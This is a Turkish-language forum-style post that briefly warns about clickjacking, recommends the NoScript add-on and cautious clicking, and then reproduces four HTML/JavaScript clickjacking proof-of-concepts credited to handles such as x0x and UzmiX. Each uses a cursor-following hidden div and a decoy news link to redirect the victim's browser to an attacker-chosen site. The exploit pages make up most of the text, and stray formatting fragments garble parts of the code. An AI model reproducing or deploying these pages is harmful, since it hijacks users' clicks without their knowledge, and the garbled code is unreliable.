S.a Dostlar.
Bu güvenlik açigini bulan kisiler bu açik hakkinda "Kötü degil,çok kötü!!!" diye bir tabir kullanmislardir.
Her browserda çalisan bu vulnerable,kisiden habersizce görevini yapar bu yüzden tehlikesi ortadadir.
Bu açik artik internet kullanicilarinin her mouse’a tiklayisinda bir paranoyaya sürükleyecek bir açik olmakla beraber, kritik bilgilerinizin degistirilmesi,çalinmasi yolunda çok büyük bir etkendir.
Peki Nasil Korunacagiz?
Su anlik sadece Firefox yetkilileri bu yönde bir çalisma yapti.
"Noscript" Plug-in’ini piyasaya sürdüler.
Pek ise yaramasada bir patch,yama ya da yeni bir güvenli browser ortaya atilana kadar sizi idare edecektir.
Bunun yaninda alabileceginiz önlemler ise ,
~ Hemen Firefox NoScript Eklentisi’ni indirin.Kullanmaya baslayin.
~ Her Linke tiklamayin.
~ Fazla merak iyi degildir, her seyi merak edip girmeyin.
~ Bilmediginiz sitelerin linklerine tiklamayin.
~ Güvenmediginiz kisilerden gelen mailleri, kisi listesine ekleme davetlerini kabul etmeyin.
~ Her seyden bir paranoya çikarin ki tehlikeyi farkedebilesiniz.
Firefox NoScript Eklentisi ;
Firefox için NoScript indir: SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small"> http://noscript.net/getit/SPAN/SPAN
* Firefox a Noscript i kurduktan sonra Tools->Add-ons->Noscript->Options->Plugins->Forbid <IFRAME>
* ClickJacking Exploitleri ;
----------------
################################################## ###########
# Application Name : Google Chrome Web Browser
# Vulnerable Type : clickjacking
# Author : x0x
################################################## ###########
< ------------------- header data end of ------------------- >
<html>
<style type="text/css">
<!--
.style1 {
font-size: 50px;
font-weight: bold;
}
.style2 {
color: #FF0000;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<bOdy>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location=’SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small">SPAN style=font-FAMILY: verdana,geneva">SPAN style=font-SIZE: xx-small">http://www.Cyber-warrior.org/x0x’;/SPAN/SPAN/SPAN/SPAN">This</div>
<p><strong>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(’open’).style.left=mouseX-2;
document.getElementById(’open’).style.top=mouseY-2;
}
</script>
</strong><a href= "SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small">SPAN style=font-FAMILY: verdana,geneva">SPAN style=font-SIZE: xx-small">http://www.haber7.com/haber.asp?id=11111/SPAN/SPAN/SPAN/SPAN" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>
<-------------------------------------------------------------->
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
################################################## #############
# Application Name : Opera Web Browser
# Author : x0x
# Vulnerable Type : ClickJacking
################################################## ###########
< ------------------- header data end of ------------------- >
<html>
<title>ClickJacking</title>
<bOdy bgcolor=black>
<a onMouseUp=window.open("SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small">SPAN style=font-FAMILY: verdana,geneva">SPAN style=font-SIZE: xx-small">http://www.google.com/SPAN/SPAN/SPAN/SPAN")
href=http://www.cyber-warrior.org/x0x">
<font color=green>Test This Vulnerable : ) </font></a></bOdy>
</html>
<-------------------------------------------------------------->
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
################################################## ###########
# Application Name : Safari Web Browser
# Vulnerable Type : clickjacking
# Author : x0x
################################################## ###########
< ------------------- header data end of ------------------- >
<html>
<bOdy>
<div id="open"
onmouseover="document.location=’SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small">SPAN style=font-FAMILY: verdana,geneva">SPAN style=font-SIZE: xx-small">http://www.Cyber-warrior.org/x0x’;/SPAN/SPAN/SPAN/SPAN"
style="position:absolute;width:8px;height:7px;back ground:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(’open’).style.left=mouseX-2;
document.getElementById(’open’).style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href= "SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small">SPAN style=font-FAMILY: verdana,geneva">SPAN style=font-SIZE: xx-small">http://www.haber7.com/haber.asp?id=11111/SPAN/SPAN/SPAN/SPAN" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber için tiklayiniz</font></a>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
################################################## ###########
# Application Name : FireFox & Internet Explorer
# Vulnerable Type : clickjacking
# Author : UzmiX ~ Orduyu Lojistik
################################################## ###########
< ------------------- header data end of ------------------- >
<html>
<bOdy>
<div id="open"
onmouseover="document.location=’SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small">SPAN style=font-FAMILY: verdana,geneva">SPAN style=font-SIZE: xx-small">http://www.uzmix.net/SPAN/SPAN/SPAN/SPAN’;"
style="position:absolute;width:8px;height:7px;back ground:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(’open’).style.left=mouseX-2;
document.getElementById(’open’).style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href= "SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small">SPAN style=font-FAMILY: verdana,geneva">SPAN style=font-SIZE: xx-small">http://www.google.com/SPAN/SPAN/SPAN/SPAN" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">SPAN style=font-FAMILY: arial,helvetica,sans-serifSPAN style=font-SIZE: x-small">SPAN style=font-FAMILY: verdana,geneva">SPAN style=font-SIZE: xx-small">http://www.google.com/SPAN/SPAN/SPAN/SPAN</font></a>
</html>
----
